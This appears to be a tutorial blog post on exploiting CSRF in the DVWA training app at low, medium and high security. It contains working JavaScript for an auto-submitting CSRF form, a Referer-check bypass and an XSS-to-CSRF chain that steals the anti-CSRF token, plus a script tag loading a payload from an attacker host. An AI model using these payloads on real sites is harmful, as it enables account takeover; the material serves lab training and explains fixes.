Let’s learn WebApp Pentest from basic on DVWA. From setup to hack. Part 4. CSRF (low to high).

Rahul Mondal
Apr 1, 2022

Hey all. How are you doing?

This is part 4 of WebApp Pentest from basic on DVWA. If you have not read the earlier parts, or don’t know how to set DVWA up, go through part 1 first. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-from-setup-to-hack-part-1-5a7d97843373

In part 2 we did brute force from low to high security. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-on-dvwa-from-setup-to-hack-part-2-bruteforce-low-to-high-82ba55e27a73

In part 3 we did command injection from low to high security. Here is the link: https://rahulmondal666.medium.com/lets-learn-webapp-pentest-from-basic-on-dvwa-f215c4bbc8

Now open DVWA and click on CSRF. We already know what CSRF is: the attacker gets the victim’s browser to send a request to a site where the victim is logged in, and the browser attaches the victim’s session cookie to it, so the site performs the action as the victim. Now we need to do it practically.

First, we will do with low security.

The page is a password change form: enter the new password and then confirm it. Note that there is no field for the current password, which is exactly what makes a forged request useful.

For this step people generally use Burp Suite, because Burp can create a CSRF PoC from an intercepted request. But that feature comes with Burp Suite Professional, not the Community edition. I have the Community edition, not Professional. So I will use the CSRF PoC generator from GitHub. Here is the link: https://github.com/merttasci/csrf-poc-generator

So, let’s git clone it.

Let’s open its index.html in the browser.

Cool. Now open Burp Suite and intercept the password-change request. I am going to set the new password to 123456.

Intercept the submission and we can see the new password in the request. The form sends it with GET, so both password fields appear in the URL query string.

Now copy the whole raw request, paste it into the CSRF generator, and select HTTP, because our DVWA is served over HTTP, not HTTPS. Click on generate and we get a CSRF PoC (an HTML page with a form that replays that exact request) for this particular request.

Save the PoC, and drop the intercepted request in Burp Suite so that the password is not changed yet.

In the saved PoC we can set any password we want; let’s put “adminpass” in both the new-password and confirm-password fields, since the form rejects a mismatch.

Now we are ready with the payload/PoC. The attacker has to deliver this page to the victim using social engineering, and the victim has to open it while logged in to DVWA; without the victim’s live session cookie the request changes nothing. Once opened, it will show like this.

The victim needs to click the submit button, which can be masked or presented as something else entirely using social engineering (the PoC could also submit itself on page load, so a click is not strictly required). Once clicked, the password changes to adminpass. We can see that it changed: the UI says the password was changed, and the new value is visible in the URL, because the request is made with the GET method. That GET is itself a weakness: anything that makes the browser fetch a URL, such as an image tag or a plain link, would trigger the change just as well as the form.
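To show what the PoC generator is doing behind the button, here is an added example (not code from the original post, from Burp, or from merttasci/csrf-poc-generator) that turns a raw HTTP request, as copied out of Burp, into a self-submitting HTML form. The sample request, host address and session cookie in it are constructed to look like the DVWA low-level password change; only the URL-encoded form parameters are handled, not JSON bodies.

```javascript
// Added example: a minimal CSRF PoC generator in the spirit of Burp's
// "Generate CSRF PoC" and merttasci/csrf-poc-generator. Not the original
// post's code. Input: a raw HTTP/1.1 request as text. Output: HTML.

// Escape text for safe embedding in HTML attributes/text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Parse "k=v&k2=v2" into [name, value] pairs, URL-decoded.
function parseQuery(qs) {
  if (!qs) return [];
  return qs.split("&").filter(Boolean).map((pair) => {
    const i = pair.indexOf("=");
    const k = i === -1 ? pair : pair.slice(0, i);
    const v = i === -1 ? "" : pair.slice(i + 1);
    return [
      decodeURIComponent(k.replace(/\+/g, " ")),
      decodeURIComponent(v.replace(/\+/g, " ")),
    ];
  });
}

// Split a raw request into method, path, query string, headers and body.
function parseRawRequest(raw) {
  const [head, ...bodyParts] = raw.replace(/\r\n/g, "\n").split("\n\n");
  const lines = head.split("\n");
  const [method, target] = lines[0].trim().split(/\s+/);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  const qIdx = target.indexOf("?");
  const path = qIdx === -1 ? target : target.slice(0, qIdx);
  const query = qIdx === -1 ? "" : target.slice(qIdx + 1);
  return { method: method.toUpperCase(), path, query, headers, body: bodyParts.join("\n\n").trim() };
}

// Build the PoC page. scheme is "http" or "https" (the generator asks the same
// question). overrides replaces parameter values, e.g. the attacker's password.
// The Cookie header is deliberately NOT copied: the victim's browser adds it.
function generateCsrfPoc(raw, scheme, overrides = {}) {
  const req = parseRawRequest(raw);
  const host = req.headers["host"];
  if (!host) throw new Error("request has no Host header");
  const action = `${scheme}://${host}${req.path}`;
  // GET carries parameters in the query string; a form POST carries them in the body.
  const params = parseQuery(req.method === "GET" ? req.query : req.body)
    .map(([k, v]) => [k, k in overrides ? overrides[k] : v]);
  const inputs = params
    .map(([k, v]) => `    <input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}" />`)
    .join("\n");
  // Auto-submit on load, so the victim only has to open the page.
  return [
    "<html>",
    '  <body onload="document.forms[0].submit()">',
    `  <form action="${escapeHtml(action)}" method="${req.method}">`,
    inputs,
    '    <input type="submit" value="Submit request" />',
    "  </form>",
    "  </body>",
    "</html>",
  ].join("\n");
}

// Constructed sample: the shape of the DVWA low-level change as seen in Burp.
// The host, cookie and Referer values are made up for this example.
const SAMPLE_REQUEST = [
  "GET /dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1",
  "Host: 192.168.1.10",
  "Cookie: security=low; PHPSESSID=deadbeef",
  "Referer: http://192.168.1.10/dvwa/vulnerabilities/csrf/",
  "Connection: close",
  "",
  "",
].join("\r\n");

if (typeof require !== "undefined" && require.main === module) {
  // Same step as the walkthrough: replace 123456 with the attacker's choice.
  console.log(generateCsrfPoc(SAMPLE_REQUEST, "http", { password_new: "adminpass", password_conf: "adminpass" }));
}
```

Run it with node and save the printed HTML as the PoC; it is equivalent to what the generator produces after you edit the password, and it auto-submits instead of waiting for a click.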

And the low-level CSRF is done.

Now let’s move to medium security.

So what does medium security add? Let’s view the source. We can see that a check on the HTTP Referer header has been added. The Referer header tells the server which page the request was sent from, so the server now accepts the change only when the Referer looks like it came from the DVWA site itself.

We already have the PoC from the low level, but a request submitted from it arrives with the attacker’s page as its Referer (or with none at all), so it is rejected. What we will do is change the password value in the PoC, say to 1234567, and then supply a Referer the server accepts.

First, intercept a password change made from the DVWA site itself (not from our PoC), so we see what a legitimate Referer looks like.

Copy the entire Referer header. Now drop this request, and intercept the request that is sent when we click submit on our PoC.

Paste the copied Referer header into the PoC’s request, after the Connection header.

And forward it.

If we want to check whether the password really changed, we can use the Test Credentials button. Put admin as the username and 1234567 as the password, and it reports a valid password for admin.

So again, the CSRF is done. Keep in mind what this step does and does not prove. Editing the Referer in Burp shows that the Referer check is the only thing standing between the PoC and the password change, but a real attacker never sees or controls the Referer the victim’s browser sends. To exploit this level for real, the PoC has to be hosted somewhere whose URL passes the server’s Referer comparison, which is why it matters exactly how the source compares the header.
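The comparison is the weak point. DVWA’s medium-level source, the one the walkthrough tells you to view, only tests whether the Referer contains the server name as a substring, so a PoC hosted on the attacker’s machine under a file or directory name that includes the DVWA address passes it without any Burp editing. The following added example (not DVWA’s code) implements that substring check next to a strict origin check and runs both over a few constructed Referer values; the DVWA and attacker addresses are assumed for the example.

```javascript
// Added example, not DVWA's code: the Referer check behind the medium level,
// written two ways, so the weakness of a substring test is visible.

const SERVER_NAME = "192.168.1.10"; // assumed DVWA host for this example

// Weak check in the style of DVWA medium: accept if the Referer contains the
// server name anywhere in the string.
function refererAcceptedWeak(referer, serverName = SERVER_NAME) {
  return typeof referer === "string" &&
    referer.toLowerCase().includes(serverName.toLowerCase());
}

// Strict check: the Referer must parse as a URL whose hostname is exactly the
// server. A missing or malformed Referer is rejected (fail closed). Comparing
// the full origin (scheme + host + port) would be stricter still.
function refererAcceptedStrict(referer, serverName = SERVER_NAME) {
  if (typeof referer !== "string") return false;
  let url;
  try {
    url = new URL(referer);
  } catch {
    return false;
  }
  return url.hostname.toLowerCase() === serverName.toLowerCase();
}

// Constructed Referer values the server might see for the change request.
const CASES = {
  // Genuine submission from the DVWA page itself.
  legit: `http://${SERVER_NAME}/dvwa/vulnerabilities/csrf/`,
  // PoC opened from a local file, or stripped by a referrer policy.
  missing: undefined,
  // PoC hosted on the attacker's box under a neutral name.
  attackerPage: "http://192.168.1.5/poc.html",
  // Same box, but the file is named after the DVWA address.
  attackerPageNamedAfterServer: `http://192.168.1.5/${SERVER_NAME}.html`,
  // Same box, DVWA address used as a directory name.
  attackerPathTrick: `http://192.168.1.5/${SERVER_NAME}/poc.html`,
};

// Run both checks over every case. Returns { caseName: { weak, strict } }.
function evaluateCases(cases = CASES) {
  const out = {};
  for (const [name, ref] of Object.entries(cases)) {
    out[name] = { weak: refererAcceptedWeak(ref), strict: refererAcceptedStrict(ref) };
  }
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(evaluateCases());
}
```

The two rows that differ are the ones to remember: a Referer of `http://192.168.1.5/192.168.1.10.html` is accepted by the substring check and rejected by the origin check, so naming your hosted PoC after the target is the realistic medium-level bypass, while the strict form is what a fix should look like.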

Let’s go with high security.

In high security we can see that an anti-CSRF token is used: the form carries a hidden, per-session token that the server checks before it changes the password, so a PoC that does not know the token is rejected. We have already dealt with this token when brute forcing in part 2. Here we use a custom script that chains an XSS into the CSRF: JavaScript running in the victim’s browser on the DVWA origin fetches the CSRF page, reads the token out of it, and submits the password change with that token attached.

The custom script is from: https://hd7exploit.wordpress.com/2017/05/27/dvwa-csrf-high-level/

Copy the script and save it on our machine. Change the link in it to our target, http://ip_address/dvwa/vulnerabilities/csrf/, and set whatever password we want.

Save it and go to the target. The script only works if it runs in the victim’s browser on the DVWA origin, because that is where the session cookie and the token live, so we need an XSS to load it. For this we go to the DOM XSS page and inject it from there.

If we click the select button we can see the language parameter in the URL (above image); that is where the injection goes. Now put the JS file in our web server’s document root (the HTML directory) so we can load it from the attacker machine.

Load it through that parameter with a simple script tag: <script src="http://jsfilemachineIPaddress/jsfile.js"></script>

I have written on the image which one is the target and which one is the attacker. The custom JS file is loaded from the attacker, although an attacker can serve it from any machine. Sorry for the bad writing on the image.

Now press enter. If nothing appears, refresh the page; it should show you the token, which means the script ran and the change went through. If it still does not show, check whether Apache is running: the JS file is served from Apache’s HTML directory, so the Apache service must be up for the script tag to load it.
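The logic that script performs, as an added example written for this page (it is not the hd7exploit script and not DVWA code): the parts that parse the token and build the change URL are plain functions that run anywhere, and the browser-only part that fetches and submits is kept separate. It assumes the anti-CSRF field is DVWA’s hidden input named user_token and that the change form is submitted with GET, as observed at the low level; the sample HTML fragment and the token value in it are constructed.

```javascript
// Added example of the token-stealing XSS -> CSRF chain used at the high level.
// Not the hd7exploit script. Assumes DVWA's hidden field is named user_token
// (confirm in the page source) and that the change form submits with GET.

// Pull the user_token value out of the CSRF page's HTML. Returns null if absent.
function extractUserToken(html) {
  const m = /name=['"]user_token['"][^>]*?value=['"]([^'"]+)['"]/i.exec(html);
  return m ? m[1] : null;
}

// Build the same GET request the change form would send, with the stolen token.
function buildChangeUrl(csrfPageUrl, token, newPassword) {
  const u = new URL(csrfPageUrl);
  u.searchParams.set("password_new", newPassword);
  u.searchParams.set("password_conf", newPassword); // must match password_new
  u.searchParams.set("Change", "Change");
  u.searchParams.set("user_token", token);
  return u.toString();
}

// Constructed fragment shaped like DVWA's change form; the token is made up.
const SAMPLE_PAGE = `
<form action="#" method="GET">
  New password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
  Confirm new password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
  <input type="submit" value="Change" name="Change">
  <input type='hidden' name='user_token' value='3f2a9c1e6b7d4e8f0a1b2c3d4e5f6a7b' />
</form>`;

// Browser-only driver. This is what the injected script does once it runs on
// the DVWA origin: the victim's session cookie rides along with fetch(), so
// the token in the response is the victim's own, and the second request is
// accepted. Returns the token so the page can display it as a success signal.
async function changePasswordViaXss(csrfPageUrl, newPassword) {
  const page = await fetch(csrfPageUrl, { credentials: "include" });
  const token = extractUserToken(await page.text());
  if (!token) throw new Error("user_token not found; is the victim logged in?");
  await fetch(buildChangeUrl(csrfPageUrl, token, newPassword), { credentials: "include" });
  return token;
}

if (typeof require !== "undefined" && require.main === module) {
  // Offline demonstration of the two pure steps on the constructed page.
  const token = extractUserToken(SAMPLE_PAGE);
  console.log("token:", token);
  console.log("change URL:", buildChangeUrl("http://192.168.1.10/dvwa/vulnerabilities/csrf/", token, "adminpass"));
}
```

The reason a token alone does not stop this chain is visible in changePasswordViaXss: the token protects against a request forged from another origin, but once script runs on the DVWA origin it can read the token like any other page content. Fixing the XSS (and setting the session cookie HttpOnly, which does not help here since the script never needs the cookie value) is what closes the hole.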

Now go to the CSRF page and click on Test Credentials with the new password.

Or we can also test by logging out and logging back in with the new password.

With that, the high-level CSRF is complete.

I hope all of you understood. Let’s meet in the next part.
